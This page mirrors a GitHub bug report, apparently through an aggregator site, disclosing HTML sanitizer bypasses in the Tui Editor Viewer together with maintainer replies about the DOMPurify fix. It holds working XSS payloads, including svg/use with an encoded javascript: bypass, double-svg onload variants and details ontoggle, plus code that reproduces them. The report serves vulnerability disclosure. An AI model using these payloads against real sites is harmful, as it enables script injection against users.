question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

HTML sanitizer bypass && Viewer XSS

See original GitHub issue

Describe the bug

I see that you have fixed some XSS (Cross-Site Scripting) vulnerabilities in the https://github.com/nhn/tui.editor/pull/1670, that’s great. But I could find out some new payloads and bypasses of the patch in the HTML sanitizer.

The purpose of this issue is to describe 3 types of XSS payload that work in the latest version of Tui Editor Viewer.

1. SVG and Use

<use> with a whitelist attribute href that could lead to a user interaction required XSS:

<svg><use href="#x"></use></svg>

Another payload that can bypass keyword javascript: checks:

<svg><use href="data:image/svg+xml;charset=ISO-2022-JP,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javas%1B%28Bcript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

2. Double SVG and patch bypass

Double svg payload is fixed in the https://github.com/nhn/tui.editor/pull/1670, but a simple regexp replacement can not solve the problem.

After code review of the newest HTML sanitizer, I find 3 payloads that can execute arbitrary javascript without user interaction at the Viewer:

<svg><svg onload=alert(1) onload=alert(2)>
<svg><svg x=">" onload=alert(1)>
<p><svg><svg onload=onload=alert(1)></svg></svg></p>

3. Details and ontoggle

A payload which is similar to <svg><svg onload=alert(1)>:

<details open ontoggle=alert(1)>

Method 2 and 3 have same principle. I suggest that you shoud replace DOM.innerHTML with DOMParser API to defend this type of attack, or better to use a well-tested third-party HTML sanitizer instead like https://github.com/cure53/DOMPurify.

To Reproduce

A simple code to reproduce:

const viewer = new Viewer({
  el: document.querySelector('#viewer'),
  height: '600px',
  initialValue: `<svg><svg x=">" onload=alert(1)>`
});

Also you can replace initialValue to another payloads to test.

Expected behavior

No JavaScript is executed.

Issue Analytics

  • State:closed
  • Created 2 years ago
  • Reactions:5
  • Comments:6 (3 by maintainers)

github_iconTop GitHub Comments

3reactions
js87zzcommented, Oct 27, 2021

@phith0n @Ben-Mack @wfinn The bug has been fixed in v3.1.1. In order to solve frequent bugs for sanitizer, DOMPurify was applied, and the above issue was resolved. Thanks for waiting!

3reactions
js87zzcommented, Sep 7, 2021

@Ben-Mack Our sanitizer will be improved using DOMPurify later. If necessary before then, please use the option below.

import DOMPurify from 'dompurify';

const purifyOptions = { ... };
const editor = new Editor({
  // ...
  customHTMLSanitizer: html => {
    return DOMPurify.sanitize(html, purifyOptions) || ''
  }
});
Read more comments on GitHub >

github_iconTop Results From Across the Web

XSS: Beating HTML Sanitizing Filters - PortSwigger
If not, a simple filter bypass is possible, by submitting your own backslash at the point where the application inserts a backslash. The...
Read more >
XSS Filter Bypass | HTML Sanitizing | Part 8 - YouTube
Thank you for watching the video about XSS Filter Bypass | HTML Sanitizing | Part 8HTML encoding is a one-way application filters the...
Read more >
How to bypass sanitization of < while exploiting an XSS ...
Input filtering is not be enough to prevent XSS, and here is a list of tests to run to see if filtering is...
Read more >
sanitize-html vulnerabilities - Snyk
version published direct vulnerabilities 2.8.0 12 Dec, 2022 0. C. 0. H. 0. M. 0. L 2.7.3 27 Oct, 2022 0. C. 0. H. 0....
Read more >
Mutation XSS via namespace confusion - DOMPurify < 2.0.17 ...
In this blogpost I'll explain my recent bypass in DOMPurify – the popular HTML sanitizer library. In a nutshell, DOMPurify's job is to...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found